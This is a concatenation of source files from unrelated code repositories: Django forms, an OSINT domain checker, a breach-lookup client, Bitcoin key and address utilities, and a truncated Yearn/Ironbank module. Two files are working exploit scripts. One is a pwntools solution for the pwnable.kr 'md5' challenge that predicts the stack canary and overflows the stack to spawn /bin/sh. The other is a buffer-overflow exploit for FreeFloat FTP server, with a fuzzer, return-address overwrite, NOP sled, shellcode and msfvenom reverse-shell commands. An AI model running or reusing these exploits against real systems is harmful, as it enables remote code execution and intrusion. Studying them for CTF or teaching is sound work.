)"""
``` |
{
"source": "0xlomrlo/Examination-Control-Committee",
"score": 2
} |
#### File: main_app/forms/hod.py
```python
from django import forms
from main_app.models import User, Instructor, Dept
from main_app.choices import *
class AddAccountForm(forms.Form):
def __init__(self, *args, **kwargs):
req_user_dcode = kwargs.pop('req_user_dcode', None)
super(AddAccountForm, self).__init__(*args, **kwargs)
self.fields['instructor'].queryset = Instructor.objects.filter(
user__isnull=True).filter(Dcode=req_user_dcode)
instructor = forms.ModelChoiceField(queryset=None)
password = forms.CharField(widget=forms.PasswordInput())
class AddMemberForm(forms.Form):
def __init__(self, *args, **kwargs):
req_user_dcode = kwargs.pop('req_user_dcode', None)
check_hod_query = Dept.objects.values('Ins_ID').exclude(Ins_ID=None)
super(AddMemberForm, self).__init__(*args, **kwargs)
self.fields['account'].queryset = Instructor.objects.filter(
user__isnull=False, user__is_member=False).filter(Dcode=req_user_dcode).exclude(Ins_ID__in=check_hod_query)
account = forms.ModelChoiceField(queryset=None)
class EditPermissionForm(forms.Form):
permission = forms.ChoiceField(choices=PERMISSION_FORM_CHOICES,)
```
#### File: main_app/forms/member.py
```python
from django import forms
from main_app.models import User, Instructor, Control, Exam
from django.utils.crypto import get_random_string
from main_app.choices import *
import datetime
class DailyReportForm(forms.Form):
today = datetime.date.today()
Notes = forms.CharField(
label="Notes", widget=forms.Textarea, required=False)
Absents = forms.ModelMultipleChoiceField(label="Absents", queryset=Instructor.objects.filter(
control__E_ID__Date__year=today.year, control__E_ID__Date__month=today.month, control__E_ID__Date__day=today.day).distinct(), widget=forms.CheckboxSelectMultiple, required=False)
AbsentsNotes = forms.CharField(
label="Notes about absents", widget=forms.Textarea, required=False)
class InvigilatorSchedulesForm(forms.Form):
Ins_ID = forms.IntegerField(label='Employee ID', min_value=0)
class InvigilatorSwitchFirstForm(forms.Form):
First_Ins_ID = forms.IntegerField(label='First Employee ID', min_value=0)
Second_Ins_ID = forms.IntegerField(label='Second Employee ID', min_value=0)
class InvigilatorSwitchSecondForm(forms.Form):
@staticmethod
def label_from_instance(obj):
course_instance = Exam.objects.values_list(
'section__CCourse__CoName', flat=True).filter(pk=obj.E_ID.pk).first()
date_instance = Exam.objects.values_list(
'Date', flat=True).filter(pk=obj.E_ID.pk).first()
rt = f'{course_instance} - ({date_instance})'
return "%s" % rt
def __init__(self, *args, **kwargs):
a = kwargs.pop('first_ins_id', None)
b = kwargs.pop('second_ins_id', None)
super(InvigilatorSwitchSecondForm, self).__init__(*args, **kwargs)
first_ins_query = Control.objects.filter(Ins_ID=a, Role='invigilator')
second_ins_query = Control.objects.filter(Ins_ID=b, Role='invigilator')
self.fields['First_Ins'].queryset = first_ins_query.exclude(
E_ID__control__in=second_ins_query)
self.fields['Second_Ins'].queryset = second_ins_query.exclude(
E_ID__control__in=first_ins_query)
self.fields['First_Ins'].label = f'Choose exam to switch for ({Instructor.objects.get(Ins_ID=a)})'
self.fields['Second_Ins'].label = f'Choose exam to switch for ({Instructor.objects.get(Ins_ID=b)})'
self.fields['First_Ins'].label_from_instance = self.label_from_instance
self.fields['Second_Ins'].label_from_instance = self.label_from_instance
First_Ins = forms.ModelMultipleChoiceField(queryset=None)
Second_Ins = forms.ModelMultipleChoiceField(queryset=None)
``` |
{
"source": "0xmachos/OSINT",
"score": 3
} |
#### File: OSINT/Infrastructure/check_live.py
```python
import argparse
import os
import signal
import sys
import requests
def ctrl_c(sig, frame):
print("\n{} chose to quit via CTRL+C!".format(os.environ['USER']))
sys.exit(0)
def parse_file(filepath):
domains = []
with open(filepath) as fp:
line = fp.readline()
while line:
domains.append(line.strip())
line = fp.readline()
return domains
def check_live(domains):
count = 0
for domain in domains:
try:
if "*" in domain:
continue
if requests.get("https://{}".format(domain)).status_code == 200:
print("{}".format(domain))
count += 1
except Exception:
continue
if count == 0:
print("None")
def main():
parser = argparse.ArgumentParser(description="Check if domain is live (HTTP 200)")
parser.add_argument("-f", "--file", action='store', dest='filepath', required=True,
help="File containing domains to check")
args = parser.parse_args()
signal.signal(signal.SIGINT, ctrl_c)
domains_to_check = parse_file(args.filepath)
check_live(domains_to_check)
exit(0)
if __name__== "__main__":
main()
``` |
{
"source": "0xmachos/python-scripts",
"score": 3
} |
#### File: 0xmachos/python-scripts/haveibeenpwnd.py
```python
import sys
import requests
import json
import hashlib
def usage():
print("Check if your email or password has been involved in a breach indexed by haveibeenpwned.com")
print("Usage:")
print(" ./haveibeenpwned <EMAIL>")
print(" ./haveibeenpwned <PASSWORD>")
exit(1)
def check_pwned(email):
url = "https://haveibeenpwned.com/api/v2/breachedaccount/{}".format(email)
req = requests.get(url)
if req.status_code == 200:
return req.content.decode('utf-8')
elif req.status_code == 404:
print("You've not been pwned!")
exit(0)
elif req.status_code == 403:
print("Request Blocked ¯\\_(ツ)_/¯" )
exit(1)
else:
print("Unknown Error")
return 1
def sort_pwned_info(pwned_data):
pwned_json = json.loads(pwned_data)
if len(pwned_json) > 1:
print("You've been pwned {} times!".format(len(pwned_json)))
else:
print("You've been pwned {} time!".format(len(pwned_json)))
for breach in pwned_json:
print(" {} : {}".format(breach['Title'], breach['BreachDate']))
def check_password(password):
password_sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()
hash_prefix = password_sha1[:5]
local_hash_suffix = password_sha1[5:]
remote_hash_suffixes = []
url = "https://api.pwnedpasswords.com/range/{}".format(hash_prefix)
req = requests.get(url)
for password in req.content.decode('utf-8').strip().split():
remote_hash_suffixes.append(password.split(':', 1)[0])
for remote_suffix in remote_hash_suffixes:
if local_hash_suffix.upper() == remote_suffix:
return(0)
return(1)
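# Note: check_password() above uses the pwnedpasswords k-anonymity range API:
# only the first 5 hex characters of the SHA-1 are sent to the server, and the
# remaining hash suffix is compared locally against the returned candidates.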
def main():
args = sys.argv[1:]
if len(args) == 0:
usage()
input = sys.argv[1]
if '@' in input:
pwned_data = check_pwned(input)
if pwned_data:
sort_pwned_info(pwned_data)
else:
if check_password(input):
print("This password has been pwned!")
else:
print("This password has not been pwned!")
exit(0)
if __name__== "__main__":
main()
``` |
{
"source": "0xmanjoos/hackerman_hackertime",
"score": 2
} |
#### File: 006/md5/test.py
```python
from pwn import *
from ctypes import CDLL
import base64
# context.log_level = 'debug'
libc = CDLL("libc.so.6")
def calc_canary(timestamp, captcha):
libc.srand(timestamp)
rands = []
for i in range(8):
rands.append(libc.rand())
    res = rands[1] + rands[5] # Corresponds to the reversed code
res += rands[2] - rands[3]
res += rands[7]
res += rands[4] - rands[6]
canary = captcha - res
if(canary<0):
# negate used to change negative num to unsigned int value
canary = util.fiddling.negate(-canary)
return canary
# We first access the server through an ssh connection (any previously provided level account works)
# I use the fix level's account :)
conn = ssh('fix', 'pwnable.kr', port=2222, password='<PASSWORD>')
# Call `date +%s` to get timestamp
get_time = conn.process('date +%s', shell=True)
# At the same time, execute the hash binary, in order to let them use the same timestamp
p = conn.connect_remote('127.0.0.1', 9002)
timestamp = int(get_time.recvline().strip('\n'))
get_time.close()
p.recvline() # remove the useless response
captcha = int(p.recvline().split(':')[1].strip(' '))
log.debug('The captcha is %d' % captcha)
canary = calc_canary(timestamp, captcha)
log.info('Calculate canary: %d(%s)' % (canary, hex(canary)))
if canary % 256 != 0:
log.warning("Well, maybe it is not the right canary, let's try again")
log.info("Recalculating canary...")
for i in [1, -1, 2, -2, 3, -3]:
log.info("Calculating canary with timestamp(%d)..." % (timestamp+i))
canary = calc_canary(timestamp+i, captcha)
if canary % 256 == 0:
log.success('Now we are talking, the true canary is %d(%s)' % (canary, hex(canary)))
break
log.warning("Nop! Canary is not %d(%s)" % (canary, hex(canary)))
log.info('Start generating payload...')
# Great! We know the canary's value, now start generate the payload
# This need base64 encode
system_addr = p32(0x08049187)
bin_sh_addr = p32(0x0804B3AC) # We input the "/bin/sh" string and calculate its position
payload = 'A'* 512 # padding to fill the blank
payload += p32(canary) # Put the canary to where it needed to be, pretend the program is running normally
payload += 'B'*12 # padding again
payload += system_addr
payload += bin_sh_addr
payload = base64.b64encode(payload) # We need to encode payload before we input binsh string
payload += '/bin/sh\x00' # It's good to know that the binsh string is a valid base64 string
log.info('Uploading payload...')
log.info(str(canary))
p.sendline(str(captcha))
p.sendline(payload)
p.recvuntil('MD5(data) :', timeout=2) # Filter all useless output to make screen clean
p.recvline(timeout=2)
log.info('Get shell! Enjoy :)')
p.interactive()
```
#### File: hackerman_hackertime/freefloat_ftp/exploit.py
```python
import socket, sys, time, binascii, struct
from pwn import cyclic, cyclic_find, unhex
from etc import payloads
"""
NOTE: i do not take credit for discovering this bug (obviously)
Tested on: windows xp, windows 7
Author: Manjoos
note:
i may attempt to write a version that bypasses windows 10 stack protections
when i have sufficient hardware to run a windows 10 vm that is
"""
# change me plz
host = "192.168.1.144"
port = 21
calc = True
p32 = lambda x: struct.pack("I", x)
offset = 250
# 0x77def049
ret = p32(0x77def049)
if calc:
buf = payloads.setbufcalc()
else:
buf = payloads.setbufshell()
# msfvenom -p windows/exec CMD=calc -f py -b "\x00\x0a\x0d"
# msfvenom -p windows/shell/reverse_tcp -b "\x00\x0a\x0d" -f py lhost=127.0.0.1 lport=4444
# bad bytes: \x00\x0a\x0d
nop = b"\x90" * 30
payload = b"A"*251 + ret + nop + buf
def main():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
print("Sending Payload!")
s.send(payload + b"\r\n")
except:
print("Yeh done goofed, i cant connect yeh pesky bastard!")
def lookup(value):
# the eip will be in little endianess, so least significant byte first
# this means that pwntools will not manually unhex/change endianess for you
# cyclic_find will only search for ascii values, anything other than that it will complain
print(cyclic_find(unhex(value)[::-1]))
def fuzz():
print("Fuzzing!")
buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A"*counter)
counter += 100
for string in buffer:
try:
p = cyclic(len(string))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
s.recv(1024)
print("Sending %s Bytes!" % len(p))
print("Payload: \n%s" % p)
s.send(p + b"\r\n")
s.recv(1024)
s.close()
time.sleep(0.5)
except socket.error:
print("Could not connect to: %s:%s" % (host, port))
sys.exit(0)
def badsend():
bad = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\
\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\
\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\
\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\
\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\
\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\
\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\
\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\
\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\
\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\
\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\
\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\
\xfb\xfc\xfd\xfe\xff"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(bad)
s.close()
try:
if len(sys.argv) > 1 and sys.argv[1] == "-b":
print("Sending bad bytes!!!")
badsend()
elif sys.argv[1] == "-f":
fuzz()
elif sys.argv[1] == "-a":
main()
elif sys.argv[1] == "-l":
lookup(sys.argv[2])
except IndexError:
print("Usage: python %s [-f] [-b] [-a] [-l]" % sys.argv[0])
print("-f\tFuzz the target!\n-b\tThrow a shit ton of bad bytes!!\n-a\tBombz Away!..")
print("-l\tLookup offset of overwritten return address (Example: -l 61616E63)")
``` |
{
"source": "0xMars/btc-address-dump",
"score": 3
} |
#### File: btc-address-dump/btc_address_dump/btc_address_dump.py
```python
import os
import sys
import re
import binascii
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__)))
sys.path.insert(0, os.path.abspath(file_path))
import mnemonic_util
import wif_util
import p2pkh_util
import p2wpkh_util
import common_util
def main_entry(argv):
mnemonic = ''
private_key = ''
private_key_wif = ''
private_key_wif_compressed = ''
public_key_uncompressed = ''
public_key_compressed = ''
addr_p2pkh_uncompressed = ''
addr_p2pkh_compressed = ''
addr_p2wpkh = ''
if len(argv) == 1:
sys.stderr.write("usage: {0} [mnemonic-words|private-key|public-key]\n".format(argv[0]))
sys.exit(1)
addresses = argv[1:]
for address_input in addresses:
if re.search("^([a-zA-Z]+\\s){11}([a-zA-Z]+).*$", address_input):
# 12 mnemonic words
# For example: olympic wine chicken argue unaware bundle tunnel grid spider slot spell need
sys.stderr.write("you input mnemonic\n")
mnemonic = address_input
private_key = mnemonic_util.mnemonic_to_private_key(mnemonic)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 66 and address_input.startswith("0x")) or len(address_input) == 64:
sys.stderr.write("you input private key\n")
# private key
# For example: 0xc7ac679b56f50bfd54dd924fe45a8dca7a1c2dced254b03dac22afc03adb9127
# For example: c7ac679b56f50bfd54dd924fe45a8dca7a1c2dced254b03dac22afc03adb9127
private_key_hex = address_input.lower().replace('0x', '')
private_key = binascii.unhexlify(private_key_hex)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 130 and address_input.startswith("0x")) or len(address_input) == 128 \
or (len(address_input) == 132 and address_input.startswith("0x04")) \
or (len(address_input) == 130 and address_input.startswith("04")):
sys.stderr.write("you input uncompressed public key\n")
# public key
# For example: <KEY>
# For example: <KEY>
# For example: 0x044cd0aaeca3b636078583408e75edd77307b5190ca7a48bb9fbc1f2576c17dff1087190d91e26af594e3f8ecd3f4d3596c03c45d3b235da916903c930c6593cc4
# For example: <KEY>
public_key_hex = address_input[-128:] # keep last 128 (remove leading 0x04, 0x, 04)
public_key_uncompressed = b'\04' + binascii.unhexlify(public_key_hex)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif (len(address_input) == 68 and address_input.startswith("0x")) or len(address_input) == 66:
sys.stderr.write("you input compressed public key\n")
# compressed public key
# For example: <KEY>
# For example: <KEY>
public_key_compressed_hexstr = address_input.lower().replace('0x', '')
public_key_compressed = binascii.unhexlify(public_key_compressed_hexstr)
public_key_uncompressed = common_util.pubkey_compressed_to_uncompressed(public_key_compressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
elif address_input.startswith("5") or address_input.startswith("K") or address_input.startswith("L"):
private_key = wif_util.decode_wif(address_input)
private_key_wif = wif_util.gen_wif_key(private_key)
private_key_wif_compressed = wif_util.gen_wif_key(private_key, compressed_WIF=True)
public_key_uncompressed = common_util.prikey_to_pubkey(private_key, compressed_pubkey=False)
public_key_compressed = common_util.pubkey_uncompressed_to_compressed(public_key_uncompressed)
addr_p2pkh_uncompressed = p2pkh_util.pubkey_to_addr(public_key_uncompressed)
addr_p2pkh_compressed = p2pkh_util.pubkey_to_addr(public_key_compressed)
addr_p2wpkh = p2wpkh_util.pubkey_to_segwit_addr(public_key_compressed)
else:
sys.stderr.write("invalid input: {0}\n".format(address_input))
sys.exit(1)
if mnemonic:
print("mnemonic = {}".format(mnemonic))
if private_key:
print("private key (hex) = {}".format(str(binascii.hexlify(private_key), 'ascii')))
if private_key_wif:
print("private key (WIF) = {}".format(str(private_key_wif, 'ascii')))
if private_key_wif_compressed:
print("private key (WIF compressed) = {}".format(str(private_key_wif_compressed, 'ascii')))
if public_key_uncompressed:
print("public key (uncompressed) = {}".format(str(binascii.hexlify(public_key_uncompressed), 'ascii')))
if public_key_compressed:
print("public key (compressed) = {}".format(str(binascii.hexlify(public_key_compressed), 'ascii')))
if addr_p2pkh_uncompressed:
print("address (p2pkh uncompressed) = {}".format(str(addr_p2pkh_uncompressed, 'ascii')))
if addr_p2pkh_compressed:
print("address (p2pkh compressed) = {}".format(str(addr_p2pkh_compressed, 'ascii')))
if addr_p2wpkh:
print("address (p2wpkh) = {}".format(addr_p2wpkh))
if __name__ == '__main__':
main_entry(sys.argv)
```
#### File: btc-address-dump/btc_address_dump/common_util.py
```python
import ecdsa
from ecdsa.ellipticcurve import PointJacobi
def pubkey_compressed_to_uncompressed(compressed_pubkey: bytes) -> bytes:
# modulo p which is defined by secp256k1's spec
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
x = int.from_bytes(compressed_pubkey[1:33], byteorder='big')
y_sq = (pow(x, 3, p) + 7) % p
y = pow(y_sq, (p + 1) // 4, p)
if compressed_pubkey[0] % 2 != y % 2:
y = p - y
y = y.to_bytes(32, byteorder='big')
return b'\04' + compressed_pubkey[1:33] + y # x + y
def pubkey_uncompressed_to_compressed(uncompressed_pubkey: bytes) -> bytes:
# Compressed public key is:
# 0x02 + x - coordinate if y is even
# 0x03 + x - coordinate if y is odd
x = int.from_bytes(uncompressed_pubkey[1:33], byteorder='big') # uncompressed_pubkey must contain prefix b'\04'
y = int.from_bytes(uncompressed_pubkey[33:65], byteorder='big')
parity = y & 1
compressed_public_key = (2 + parity).to_bytes(1, byteorder='big') + x.to_bytes(32, byteorder='big')
return compressed_public_key
def pubkey_from_bytes_to_point(pubkey: bytes) -> tuple[int, int]:
assert len(pubkey) == 33 or len(pubkey) == 65
if len(pubkey) == 33: # compressed pubkey
uncompressed_pubkey = pubkey_compressed_to_uncompressed(pubkey)
else:
uncompressed_pubkey = pubkey
x = int.from_bytes(uncompressed_pubkey[1:33], byteorder='big') # uncompressed_pubkey must contain prefix b'\04'
y = int.from_bytes(uncompressed_pubkey[33:65], byteorder='big')
return x, y
def pubkey_from_point_to_bytes(x: int, y: int, compressed: bool = True) -> bytes:
xstr = x.to_bytes(32, byteorder='big')
ystr = y.to_bytes(32, byteorder='big')
if compressed:
parity = y & 1
return (2 + parity).to_bytes(1, byteorder='big') + xstr
else:
return b'\04' + xstr + ystr
def prikey_to_pubkey(private_key: bytes, compressed_pubkey: bool = True) -> bytes:
Q: PointJacobi = int.from_bytes(private_key, byteorder='big') * ecdsa.curves.SECP256k1.generator
return pubkey_from_point_to_bytes(Q.x(), Q.y(), compressed_pubkey)
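# Minimal sanity sketch (illustrative key value of 1, i.e. the generator point):
# the compressed/uncompressed conversions should round-trip.
# >>> priv = (1).to_bytes(32, byteorder='big')
# >>> pub_u = prikey_to_pubkey(priv, compressed_pubkey=False)
# >>> pub_c = pubkey_uncompressed_to_compressed(pub_u)
# >>> pubkey_compressed_to_uncompressed(pub_c) == pub_u
# True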
```
#### File: btc-address-dump/btc_address_dump/wif_util.py
```python
import binascii
import hashlib
import base58
from typing import Union
def scrub_input(hex_str_or_bytes: Union[str, bytes]) -> bytes:
if isinstance(hex_str_or_bytes, str):
hex_str_or_bytes = binascii.unhexlify(hex_str_or_bytes)
return hex_str_or_bytes
# wallet import format key - base58 encoded format
# https://bitcoin.stackexchange.com/questions/9244/private-key-to-wif
def gen_wif_key(private_key: Union[str, bytes], compressed_WIF: bool = False) -> bytes:
private_key = scrub_input(private_key)
# prepended mainnet version byte to private key
mainnet_private_key = b'\x80' + private_key
if compressed_WIF:
mainnet_private_key = b'\x80' + private_key + b'\x01'
# mainnet_private_key = decode_hex('800c28fca386c7a227600b2fe50b7cae11ec86d3bf1fbe471be89827e19d72aa1d')
# perform SHA-256 hash on the mainnet_private_key
sha256 = hashlib.sha256()
sha256.update(mainnet_private_key)
hash_bytes = sha256.digest()
# perform SHA-256 on the previous SHA-256 hash
sha256 = hashlib.sha256()
sha256.update(hash_bytes)
hash_bytes = sha256.digest()
# create a checksum using the first 4 bytes of the previous SHA-256 hash
# append the 4 checksum bytes to the mainnet_private_key
checksum = hash_bytes[:4]
# print('checksum', binascii.hexlify(checksum))
hash_bytes = mainnet_private_key + checksum
# print('hash', binascii.hexlify(hash))
# convert mainnet_private_key + checksum into base58 encoded string
return base58.b58encode(hash_bytes)
def decode_wif(wif: str) -> bytes:
compressed = False
if wif.startswith('K') or wif.startswith('L'):
compressed = True
decoded = base58.b58decode(wif)
if compressed:
private_key = decoded[1:-5] # [80 xxx 1 checksum]
else:
private_key = decoded[1:-4] # [80 xxx checksum]
return private_key
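# Illustrative round-trip sketch (the key below is the well-known example value
# from the comment in gen_wif_key, not a real wallet key):
# >>> priv_hex = "0c28fca386c7a227600b2fe50b7cae11ec86d3bf1fbe471be89827e19d72aa1d"
# >>> wif = gen_wif_key(priv_hex)  # uncompressed-WIF form, starts with '5'
# >>> decode_wif(wif.decode()) == binascii.unhexlify(priv_hex)
# True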
``` |
{
"source": "0xMartin/SimpleApp-Pygame-framework",
"score": 3
} |
#### File: SimpleApp-Pygame-framework/SimpleApp/colors.py
```python
BLACK = (0, 0, 0)
GRAY = (127, 127, 127)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
def colorChange(color: tuple, amount: float) -> tuple:
"""
Change color lightness
Parameters:
color -> default color
amount -> from -2(darker) o 2(lighter)
"""
rgb = list(color)
amount = 1.0 + amount / 2.0
rgb[0] *= amount
rgb[1] *= amount
rgb[2] *= amount
rgb[0] = max(min(rgb[0], 255), 0)
rgb[1] = max(min(rgb[1], 255), 0)
rgb[2] = max(min(rgb[2], 255), 0)
return tuple(rgb)
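# Illustrative example: colorChange(RED, -1.0) scales each channel by 0.5 and
# returns roughly (127.5, 0.0, 0.0), i.e. a darker red.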
def colorAdd(color: tuple, amount: int) -> tuple:
"""
Add number to color
Parameters:
color -> default color
amount ->
"""
rgb = list(color)
rgb[0] += amount
rgb[0] = max(min(rgb[0], 255), 0)
rgb[1] += amount
rgb[1] = max(min(rgb[1], 255), 0)
rgb[2] += amount
rgb[2] = max(min(rgb[2], 255), 0)
return tuple(rgb)
def colorInvert(color: tuple) -> tuple:
"""
Invert color
Parameters:
color -> default color
"""
rgb = list(color)
rgb[0] = 255 - rgb[0]
rgb[1] = 255 - rgb[1]
rgb[2] = 255 - rgb[2]
return tuple(rgb)
def createColor(red: int, green: int, blue: int) -> tuple:
"""
Create color
Parameters:
red -> 0-255
green -> 0-255
blue -> 0-255
"""
    return (
        max(min(red, 255), 0),
        max(min(green, 255), 0),
        max(min(blue, 255), 0)
    )
```
#### File: SimpleApp/gui/checkbox.py
```python
import pygame
from ..utils import *
from ..colors import *
from ..guielement import *
from SimpleApp.gui.label import Label
class CheckBox(GUIElement):
def __init__(self, view, style: dict, text: str, checked: bool, size: int = 20, x: int = 0, y: int = 0):
"""
Create CheckBox element
Parameters:
view -> View where is element
style -> More about style for this element in config/styles.json
            text -> Text of the CheckBox label
            checked -> Is checked?
            size -> Size (width and height) of CheckBox
x -> X position
y -> Y position
"""
super().__init__(view, x, y, size, size, style)
self.label = Label(view, super().getStyle()[
"label"], text, False, True, x, y)
self.checked = checked
self.callback = None
def setText(self, text: str):
"""
Set text of label
Parameters:
text -> New text
"""
if self.label is not None:
self.label.setText(text)
def getLabel(self) -> Label:
"""
Get label
"""
return self.label
def setCheckedEvt(self, callback):
"""
Set checkbox Checked event
Parameters:
callback -> callback function
"""
self.callback = callback
def setChecked(self, checked: bool):
"""
Set checked state of this check box
Parameters:
checked -> True = Is checked
"""
self.checked = checked
    def isChecked(self) -> bool:
"""
Return if this check box is checked
"""
return self.checked
@overrides(GUIElement)
def draw(self, view, screen):
# lable
if self.label is not None:
self.label.setX(super().getX() + super().getWidth() + 5)
self.label.setY(super().getY() + super().getHeight() / 2)
self.label.draw(view, screen)
# check box
if super().isSelected():
c = super().getStyle()["background_color"]
pygame.draw.rect(screen, colorChange(
c, -0.2 if c[0] > 128 else 0.6), super().getViewRect(), border_radius=6)
else:
pygame.draw.rect(screen, super().getStyle()[
"background_color"], super().getViewRect(), border_radius=5)
pygame.draw.rect(screen, super().getStyle()[
"outline_color"], super().getViewRect(), 2, border_radius=5)
# check
if self.checked:
pts = [
(super().getX() + super().getWidth() * 0.2,
super().getY() + super().getWidth() * 0.5),
(super().getX() + super().getWidth() * 0.4,
super().getY() + super().getWidth() * 0.75),
(super().getX() + super().getWidth() * 0.8,
super().getY() + super().getWidth() * 0.2)
]
pygame.draw.lines(screen, super().getStyle()
["foreground_color"], False, pts, round(7 * super().getWidth() / 40))
@overrides(GUIElement)
def processEvent(self, view, event):
if event.type == pygame.MOUSEBUTTONDOWN:
if inRect(event.pos[0], event.pos[1], super().getViewRect()):
if self.callback is not None:
self.callback(self)
self.checked = not self.checked
elif event.type == pygame.MOUSEMOTION:
if inRect(event.pos[0], event.pos[1], super().getViewRect()):
super().select()
else:
super().unSelect()
@overrides(GUIElement)
def update(self, view):
pass
```
#### File: SimpleApp/gui/image.py
```python
import pygame
from ..utils import *
from ..colors import *
from ..guielement import *
class Image(GUIElement):
def __init__(self, view, image_path: str, width: int = 0, height: int = 0, x: int = 0, y: int = 0):
"""
Create Image element
Parameters:
view -> View where is element
image_path -> Image path
width -> Width of Image
height -> Height of Image
x -> X position
y -> Y position
"""
super().__init__(view, x, y, width, height, None)
self.image = loadImage(image_path)
def setImage(self, image_path: str):
"""
Set new image
Parameters:
image_path -> Image path
"""
self.image = loadImage(image_path)
def getImage(self) -> pygame.Surface:
"""
Get image
"""
return self.image
@overrides(GUIElement)
def draw(self, view, screen):
if self.image is not None:
screen.blit(pygame.transform.scale(self.image, (super().getWidth(
), super().getHeight())), (super().getX(), super().getY()))
@overrides(GUIElement)
def processEvent(self, view, event):
pass
@overrides(GUIElement)
def update(self, view):
pass
```
#### File: SimpleApp-Pygame-framework/SimpleApp/stylemanager.py
```python
from .utils import *
class StyleManager:
"""
Provides style for each GUI element. Loading and preserves all application styles.
"""
def __init__(self, styles_path):
"""
Create style manager
Parameters:
            styles_path -> Path to the file with styles for all gui elements
"""
self.styles_path = styles_path
def init(self):
"""
Init style manager
"""
self.loadStyleSheet(self.styles_path)
def loadStyleSheet(self, styles_path):
"""
Load stylesheet from file
Parameters:
            styles_path -> Path to the file with styles for all gui elements
"""
self.styles = loadConfig(styles_path)
def getStyleWithName(self, name) -> dict:
"""
        Get style with specific name from stylesheet
Parameters:
name -> Name of style
"""
if name not in self.styles.keys():
return None
else:
return self.processStyle(self.styles[name])
def processStyle(self, style) -> dict:
"""
Some string values are replaced by an object if necessary
Parameters:
style -> Some style
"""
# colors
new_style = style.copy()
for tag in new_style.keys():
if "color" in tag:
rgb = new_style[tag].split(",")
new_style[tag] = tuple([int(rgb[0]), int(rgb[1]), int(rgb[2])])
elif isinstance(new_style[tag], dict):
new_style[tag] = self.processStyle(new_style[tag])
return new_style
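# Illustrative example (hypothetical style entry): processStyle turns
#   {"background_color": "10,20,30", "label": {"font_color": "0,0,0"}}
# into
#   {"background_color": (10, 20, 30), "label": {"font_color": (0, 0, 0)}}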
``` |
{
"source": "0xMayflower/yearn-exporter",
"score": 2
} |
#### File: yearn-exporter/yearn/ironbank.py
```python
from collections import defaultdict
from dataclasses import dataclass
from brownie import Contract
from brownie.network.contract import InterfaceContainer
from joblib import Parallel, delayed
from yearn.utils import contract_creation_block
from yearn.multicall2 import multicall_matrix
from yearn.prices import magic
@dataclass
class IronbankMarket:
name: str
vault: InterfaceContainer
token_name: str
underlying: InterfaceContainer
cdecimals: int
decimals: int
@property
def token(self):
return self.underlying
class Registry:
def __init__(self):
